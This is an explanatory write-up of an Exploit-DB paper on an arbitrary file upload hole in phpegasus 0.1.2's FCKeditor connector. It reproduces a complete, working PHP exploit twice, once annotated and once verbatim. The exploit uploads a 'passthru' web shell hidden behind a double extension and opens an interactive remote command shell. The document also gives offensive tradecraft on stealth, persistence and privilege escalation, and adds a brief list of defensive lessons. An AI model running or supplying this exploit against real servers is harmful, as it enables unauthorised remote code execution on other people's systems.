Understanding the phpegasus 0.1.2 FCKeditor Arbitrary File Upload Exploit

Understanding the phpegasus 0.1.2 FCKeditor Arbitrary File Upload Exploit
What this paper is
This paper details a vulnerability in phpegasus version 0.1.2 (and likely 0.1.1) that allows an attacker to upload arbitrary files, including PHP code, to a web server. This is achieved by exploiting how the FCKeditor's file manager component, specifically its PHP connector, handles file uploads. The exploit leverages a misconfiguration or lack of proper validation in the FCKeditor's config.php file to bypass intended file type restrictions.
Simple technical breakdown
The core of the vulnerability lies in the FCKeditor's file upload functionality. When a user uploads a file, the server is supposed to check its extension against a list of allowed types. However, this specific version of phpegasus, when using FCKeditor, doesn't properly sanitize or validate file extensions.
The exploit works by:
- Crafting a malicious PHP payload: The attacker creates a small PHP script that can execute commands sent to it.
- Disguising the payload: The PHP script is given a filename that ends with a seemingly legitimate extension (like
.jpgor.zip) followed by.php. For example,0k.php.jpg. - Uploading the disguised payload: The exploit script sends a specially crafted HTTP POST request to the FCKeditor's file manager. This request includes the disguised PHP file.
- Bypassing restrictions: Because the FCKeditor's backend might not correctly handle the double extension (
.php.jpg), it might allow the upload. Themod_mimemodule on the Apache server, if configured in a certain way, could also contribute to this bypass by misinterpreting the file type. - Executing the payload: Once uploaded, the attacker can access the uploaded file via a URL. By sending commands to the uploaded PHP script (encoded in an HTTP header), the attacker can execute arbitrary commands on the server.
Complete code and payload walkthrough
The provided PHP script is an exploit tool designed to automate the process of finding and exploiting this vulnerability.
<?php
/*
-----------------------------------------------------------------
phpegasus (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
... (ASCII art and header information) ...
*/
// --- Configuration and Setup ---
error_reporting(0); // Suppress PHP errors for a cleaner output.
set_time_limit(0); // Allow the script to run indefinitely without timing out.
ini_set("default_socket_timeout", 5); // Set a 5-second timeout for socket operations.
// --- Function: http_send ---
// Purpose: Sends an HTTP request to a given host and returns the response.
// Inputs:
// $host: The hostname or IP address of the target server.
// $packet: The raw HTTP request string to send.
// Behavior:
// Opens a socket connection to the host on port 80.
// If the connection fails, it retries until successful.
// Sends the HTTP packet.
// Reads the entire response from the socket.
// Closes the socket.
// Output:
// The complete HTTP response string received from the server.
function http_send($host, $packet)
{
$sock = fsockopen($host, 80); // Open a socket connection to the host on port 80.
while (!$sock) // Loop until a socket connection is established.
{
print "\n[-] No response from {$host}:80 Trying again..."; // Inform the user about retries.
$sock = fsockopen($host, 80); // Attempt to reconnect.
}
fputs($sock, $packet); // Send the crafted HTTP packet.
while (!feof($sock)) $resp .= fread($sock, 1024); // Read the response in chunks.
fclose($sock); // Close the socket connection.
return $resp; // Return the collected response.
}
// --- Function: upload ---
// Purpose: Attempts to upload a malicious PHP file to the vulnerable server.
// Global Variables Used:
// $host: Target host.
// $path: Target path on the server.
// Behavior:
// Iterates through a predefined list of file extensions.
// For each extension, it constructs a multipart/form-data POST request.
// The filename is crafted as "0k.php.<ext>" to bypass potential checks.
// The content of the uploaded file is a PHP payload: "<?php ${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>".
// - `_code_` is a marker to easily extract the output later.
// - `passthru(base64_decode($_SERVER[HTTP_CMD]))` executes a command received in the HTTP_CMD header after decoding it from base64.
// It sends the upload request and parses the response to check for upload success (error codes 0 or 201).
// After a successful upload attempt, it sends a GET request to the uploaded file to verify if the payload is active (checks for "print" and "_code_").
// If successful, it returns the extension used for the upload.
// Output:
// The file extension used for a successful upload (e.g., "jpg"), or false if the upload fails.
function upload()
{
global $host, $path; // Access global variables for host and path.
$connector = "/core/editor/editor/filemanager/connectors/php/config.php"; // The vulnerable FCKeditor connector path.
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv"); // List of extensions to try for bypassing.
foreach ($file_ext as $ext) // Loop through each potential extension.
{
print "\n[-] Trying to upload with .{$ext} extension..."; // Inform about the current attempt.
// --- Payload Construction ---
$data = "--abcdef\r\n"; // Start of multipart/form-data boundary.
// Content-Disposition: Specifies the form field name ("NewFile") and the filename.
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
// Content-Type: Standard for binary data.
$data .= "Content-Type: application/octet-stream\r\n\r\n";
// The actual PHP payload.
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--abcdef--\r\n"; // End of multipart/form-data boundary.
// --- HTTP Request Packet Construction ---
// POST request to the FCKeditor connector.
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n"; // Host header.
$packet .= "Content-Length: ".strlen($data)."\r\n"; // Length of the data being sent.
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n"; // Specifies the multipart format and boundary.
$packet .= "Connection: close\r\n\r\n"; // Close connection after response.
$packet .= $data; // Append the actual form data.
// --- Send Request and Parse Response ---
// Use preg_match to extract information from the FCKeditor's response.
// It looks for "OnUploadCompleted(error_code, 'message')" pattern.
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
// Check if the upload was successful (error codes 0 or 201 are considered success by the script).
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
// --- Verification Step ---
// Send a GET request to the uploaded file to check if it's active.
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
// Check if the response contains "print" and "_code_" markers, indicating the PHP payload executed.
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext; // If successful, return the extension.
sleep(1); // Wait for 1 second before trying the next extension.
}
return false; // Return false if no extension worked.
}
// --- Main Execution Block ---
print "\n+--------------------------------------------------------------------------+";
print "\n| phpegasus (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------------+";
// --- Argument Check ---
if ($argc < 3) // Check if the correct number of command-line arguments are provided.
{
print "\nUsage......: php $argv[0] host path\n"; // Display usage instructions.
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /phpegasus/\n";
die(); // Exit if arguments are missing.
}
// --- Variable Assignment ---
$host = $argv[1]; // Assign the first argument (host) to $host.
$path = $argv[2]; // Assign the second argument (path) to $path.
// --- Attempt Upload ---
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n"); // Call the upload function and exit if it fails.
else print "\n[-] Shell uploaded...starting it!\n"; // Inform the user if the shell was uploaded.
// --- Interactive Shell ---
define(STDIN, fopen("php://stdin", "r")); // Define STDIN to read from standard input.
while(1) // Infinite loop for the interactive shell.
{
print "\phpegasus-shell# "; // Display the shell prompt.
$cmd = trim(fgets(STDIN)); // Read a command from the user and trim whitespace.
if ($cmd != "exit") // If the command is not "exit".
{
// --- Construct Command Execution Packet ---
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n"; // GET request to the uploaded shell.
$packet.= "Host: {$host}\r\n"; // Host header.
// Cmd header contains the base64 encoded command to be executed by the shell.
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n"; // Close connection.
$html = http_send($host, $packet); // Send the packet and get the response.
// --- Parse and Display Output ---
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n"); // Check if the response contains the marker.
$shell = explode("_code_", $html); // Split the response by the marker.
print "\n{$shell[1]}"; // Print the command output (the part after the first _code_ marker).
}
else break; // If the command is "exit", break the loop.
}
?>
**Code Fragment/Block -> Practical Purpose Mapping:**
* `error_reporting(0);` -> **Purpose:** Suppress PHP errors. **Practical:** Makes the exploit output cleaner, hiding potential debugging information that might reveal the exploit's presence or internal workings.
* `set_time_limit(0);` -> **Purpose:** Remove script execution time limit. **Practical:** Ensures the exploit can run for as long as needed, especially during the interactive shell phase, without being terminated by server-side limits.
* `ini_set("default_socket_timeout", 5);` -> **Purpose:** Set socket timeout. **Practical:** Prevents the script from hanging indefinitely if a connection fails or is slow, allowing for quicker retries or failure detection.
* `function http_send($host, $packet)` -> **Purpose:** Generic HTTP request sender. **Practical:** This is the core network communication function. It handles establishing TCP connections, sending raw HTTP requests, and receiving responses. Essential for interacting with the web server without relying on higher-level PHP HTTP client libraries, which might have their own security checks or logging.
* `$sock = fsockopen($host, 80);` -> **Purpose:** Open TCP socket. **Practical:** Low-level network connection. Allows direct control over the HTTP communication.
* `while (!$sock) { ... }` -> **Purpose:** Connection retry logic. **Practical:** Increases robustness. If the initial connection attempt fails (e.g., due to temporary network issues or server load), it keeps trying, improving the chances of success.
* `fputs($sock, $packet);` -> **Purpose:** Send HTTP request. **Practical:** Transmits the crafted attack request to the target.
* `while (!feof($sock)) $resp .= fread($sock, 1024);` -> **Purpose:** Read HTTP response. **Practical:** Collects the server's reply, which contains information about the upload status or command execution results.
* `function upload()` -> **Purpose:** Orchestrates the file upload exploit. **Practical:** This function encapsulates the entire exploit logic for uploading the malicious file. It handles the iteration over extensions, payload construction, and verification.
* `$connector = "/core/editor/editor/filemanager/connectors/php/config.php";` -> **Purpose:** Target file path. **Practical:** Identifies the specific vulnerable component within the FCKeditor integration.
* `$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");` -> **Purpose:** List of bypass extensions. **Practical:** These are common file extensions that might be allowed by the FCKeditor or server configurations. The exploit tries to trick the system by appending `.php` to these.
* `$data = "--abcdef\r\n"; ... $data .= "--abcdef--\r\n";` -> **Purpose:** Multipart/form-data construction. **Practical:** This is how file uploads are typically sent in HTTP. The `boundary` string separates different parts of the request, including the file content. The `name="NewFile"` is crucial as it's the form field name expected by the FCKeditor.
* `filename=\"0k.php.{$ext}\"` -> **Purpose:** Malicious filename. **Practical:** This is the key to the bypass. By having `.php` followed by another extension, it aims to confuse file type validation mechanisms. `0k` is likely just a placeholder filename.
* `$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";` -> **Purpose:** PHP shell payload. **Practical:** This is the code that gets uploaded.
* `\${print(_code_)}` and `.\${print(_code_)}` are used as delimiters to easily parse the output of the executed command from the HTTP response.
* `\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}` is the core command execution. `$_SERVER[HTTP_CMD]` retrieves a custom HTTP header named `Cmd`. `base64_decode` decodes the command, and `passthru` executes it and outputs the raw result directly.
* `$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";` -> **Purpose:** Upload request initiation. **Practical:** Constructs the HTTP POST request targeting the FCKeditor connector with specific parameters (`Command=FileUpload`, `CurrentFolder`). `CurrentFolder` might be used to influence where the file is attempted to be saved.
* `preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);` -> **Purpose:** Parse upload response. **Practical:** The FCKeditor's connector often returns a structured response (like JavaScript or JSON) indicating the upload status. This regex extracts the error code and message.
* `if (!in_array(intval($html[1]), array(0, 201))) die(...)` -> **Purpose:** Check upload success. **Practical:** Validates that the server reported a successful upload (codes 0 and 201 are treated as success by this script).
* `if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;` -> **Purpose:** Verify shell functionality. **Practical:** After uploading, the script fetches the uploaded file. This check ensures that the PHP payload is active and has started processing (indicated by the presence of `_code_` and the absence of `print` which might indicate an error or a non-executed script).
* `if ($argc < 3) { ... }` -> **Purpose:** Command-line argument validation. **Practical:** Ensures the user provides the necessary `host` and `path` arguments.
* `$host = $argv[1]; $path = $argv[2];` -> **Purpose:** Assign host and path. **Practical:** Sets up the target details for the exploit.
* `define(STDIN, fopen("php://stdin", "r"));` -> **Purpose:** Enable reading from standard input. **Practical:** Allows the script to accept user input for commands when running the interactive shell.
* `while(1) { ... }` -> **Purpose:** Interactive shell loop. **Practical:** Creates a command-line interface where the attacker can type commands and see their output in real-time.
* `$cmd = trim(fgets(STDIN));` -> **Purpose:** Read user command. **Practical:** Captures the command entered by the attacker.
* `$packet.= "Cmd: ".base64_encode($cmd)."\r\n";` -> **Purpose:** Send command in header. **Practical:** This is how commands are sent to the uploaded PHP shell. The command is base64 encoded to avoid issues with special characters in HTTP headers and then placed in the `Cmd` header.
* `$shell = explode("_code_", $html); print "\n{$shell[1]}";` -> **Purpose:** Extract and display command output. **Practical:** Parses the response from the target server, isolates the output of the executed command (between the `_code_` markers), and displays it to the attacker.
## Practical details for offensive operations teams
* **Required Access Level:** Network access to the target web server (typically port 80/443). No prior authentication or user privileges are required if the FCKeditor component is accessible.
* **Lab Preconditions:**
* A target machine running a vulnerable version of phpegasus (0.1.1 or 0.1.2) with FCKeditor integrated.
* An Apache web server with `mod_mime` potentially configured in a way that allows extension bypass.
* The FCKeditor's `config.php` file must have `$Config['Enabled'] = true;` and potentially weak or absent checks on `AllowedExtensions` for file uploads.
* The target web server must be reachable from the attacker's machine.
* **Tooling Assumptions:**
* PHP interpreter installed on the attacker's machine to run the exploit script.
* Basic network connectivity.
* **Execution Pitfalls:**
* **FCKeditor Configuration:** The exploit relies on the FCKeditor's `config.php` being misconfigured. If `$Config['Enabled']` is `false`, or if `AllowedExtensions` are strictly enforced and the bypass doesn't work, the exploit will fail.
* **Server-Side Validation:** Modern web application firewalls (WAFs) or stricter server-side validation (e.g., checking the actual file content's MIME type, not just the extension) can prevent this.
* **`mod_mime` Configuration:** The paper mentions `mod_mime` as a potential factor. If the server's `mod_mime` is configured to strictly enforce MIME types based on content, the exploit might fail.
* **Path Traversal/Write Permissions:** The exploit assumes the `CurrentFolder` parameter and the web server's permissions allow writing to the intended upload directory. If the path is incorrect or write permissions are denied, the upload will fail.
* **Network Issues:** Unstable network connections or firewalls blocking the traffic can disrupt the exploit.
* **Response Parsing:** The exploit relies on specific response patterns from the FCKeditor. If the FCKeditor version or its integration changes its response format, the `preg_match` might fail.
* **Payload Detection:** Antivirus or intrusion detection systems might flag the uploaded PHP shell or the exploit script itself.
* **Tradecraft Considerations:**
* **Reconnaissance:** Identify the phpegasus version and the presence of FCKeditor. Look for accessible `/core/editor/editor/filemanager/connectors/php/config.php` or similar paths. Check if the FCKeditor's file manager is enabled.
* **Stealth:** The exploit script itself is a direct tool. For stealthier operations, one might manually craft HTTP requests or use a more sophisticated framework. The initial upload attempt might be noisy. The interactive shell phase is inherently noisy as it involves continuous communication.
* **Payload Placement:** The exploit uploads `0k.php.<ext>`. The attacker needs to know the exact URL to access this shell. The `path` variable is crucial here.
* **Persistence:** This exploit provides a web shell, which is a form of persistence. However, it's dependent on the web server process. For longer-term persistence, further actions would be needed.
* **Privilege Escalation:** The shell runs with the privileges of the web server process (e.g., `www-data`, `apache`). Further privilege escalation techniques would be required if higher privileges are needed.
* **Likely Failure Points:**
* FCKeditor's `config.php` is not enabled (`$Config['Enabled'] = false;`).
* Strict `AllowedExtensions` are enforced and the `.php.<ext>` bypass fails.
* The web server does not have write permissions in the target directory.
* Network firewalls blocking the HTTP/HTTPS traffic.
* The target path to FCKeditor is incorrect.
* The server's `mod_mime` or other security mechanisms correctly identify the uploaded file as PHP.
## Where this was used and when
* **Approximate Year:** The paper was published on April 25, 2010. This indicates the vulnerability was likely discovered and weaponized around that time.
* **Context:** This exploit targets a specific integration of the FCKeditor rich text editor within the phpegasus web application. It would have been used against websites running older versions of phpegasus that incorporated this vulnerable FCKeditor component. The exploit is designed for remote exploitation, meaning it could be used against any publicly accessible phpegasus installation with the vulnerable configuration.
## Defensive lessons for modern teams
* **Secure Configuration Defaults:** Always ensure that sensitive features like file upload connectors are disabled by default (`$Config['Enabled'] = false;`). Administrators must explicitly enable them and understand the security implications.
* **Strict File Type Validation:** Never rely solely on file extensions. Implement robust validation that checks the actual file content (e.g., MIME type sniffing, magic byte analysis) to ensure it matches the declared type and is allowed.
* **Sanitize Filenames:** Properly sanitize filenames to prevent directory traversal, null byte injection, and other attacks. Avoid allowing double extensions or extensions that could be interpreted by the server in unintended ways.
* **Principle of Least Privilege:** The web server process should have minimal file system permissions. It should only be able to write to specific, designated directories and not to executable script locations.
* **Keep Software Updated:** Regularly update all web applications, libraries, and components (like FCKeditor) to patch known vulnerabilities.
* **Web Application Firewalls (WAFs):** Deploy and properly configure WAFs to detect and block malicious HTTP requests, including those attempting arbitrary file uploads or exploiting known vulnerabilities.
* **Regular Security Audits:** Conduct regular code reviews and penetration tests to identify and remediate vulnerabilities before they can be exploited.
* **Understand Server Modules:** Be aware of how server modules like `mod_mime` behave and how they might interact with application-level security.
## ASCII visual (if applicable)
This exploit involves a client-server interaction and a file upload process. A simple visual representation of the upload flow would be:
```ascii
+-----------------+ HTTP POST (Multipart/form-data) +-----------------+
| Attacker's | -----------------------------------------> | Target Web Server |
| Machine | | (phpegasus + |
| (Exploit Script)| | FCKeditor) |
+-----------------+ Filename: 0k.php.<ext> +-----------------+
Payload: <?php passthru(...) ?>
|
| (Upload Request)
v
+-------------------------+
| FCKeditor Connector |
| (config.php) |
| - Accepts upload |
| - Bypasses extension |
| check (vulnerable) |
+-------------------------+
|
| (Writes file to webroot)
v
+-------------------------+
| Web Server Document Root|
| (e.g., /var/www/html/) |
| - 0k.php.<ext> |
+-------------------------+
+-----------------+ HTTP GET (with Cmd header) +-----------------+
| Attacker's | -----------------------------------------> | Target Web Server |
| Machine | | (Accessing shell)|
| (Interactive | +-----------------+
| Shell) | Cmd: base64_encode(command)
+-----------------+ |
| (Executes payload)
v
+-----------------+
| Web Server |
| Process |
| - Executes |
| passthru() |
+-----------------+
|
| (Returns output)
v
+-----------------+
| Target Web Server |
| (Response with |
| output) |
+-----------------+
|
| (Response)
v
+-----------------+ HTTP Response (with output) +-----------------+
| Attacker's | <----------------------------------------- | Target Web Server |
| Machine | | |
+-----------------+ +-----------------+Source references
- Paper ID: 12381
- Paper Title: phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload
- Author: eidelweiss
- Published: 2010-04-25
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/12381
- Raw URL: https://www.exploit-db.com/raw/12381
Original Exploit-DB Content (Verbatim)
<?php
/*
-----------------------------------------------------------------
phpegasus (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Vendor: www.phpegasus.com
Download : http://www.phpegasus.com/versions/phpegasus0-1-2b.zip
exploited by ..: eidelweiss
Affected: phpegasus0_1_1 , phpegasus0_1_2
details..: works with an Apache server with the mod_mime module installed (if specific)
[-] vulnerable code in path/core/editor/editor/filemanager/connectors/php/config.php
[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").
[*]
[*] $Config['Enabled'] = true ;
[*]
[*] // Path to user files relative to the document root.
[*] $Config['UserFilesPath'] = '/userfiles/' ;
[*]
[*] // Fill the following value it you prefer to specify the absolute path for the
[*] // user files directory. Usefull if you are using a virtual directory, symbolic
[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.
[*] // Attention: The above 'UserFilesPath' must point to the same directory.
[*]
[*]
[*] $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....]
[*] $Config['DeniedExtensions']['File'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Image'] = array('bmp','gif','jpeg','jpg','png') ;
[*] $Config['DeniedExtensions']['Image'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Flash'] = array('swf','flv') ;
[*] $Config['DeniedExtensions']['Flash'] = array() ;
[*]
[*] $Config['AllowedExtensions']['Media'] = array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;
[*] $Config['DeniedExtensions']['Media'] = array() ;
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "/core/editor/editor/filemanager/connectors/php/config.php";
$file_ext = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--abcdef\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--abcdef--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------------+";
print "\n| phpegasus (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /phpegasus/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\phpegasus-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $html);
print "\n{$shell[1]}";
}
else break;
}
?>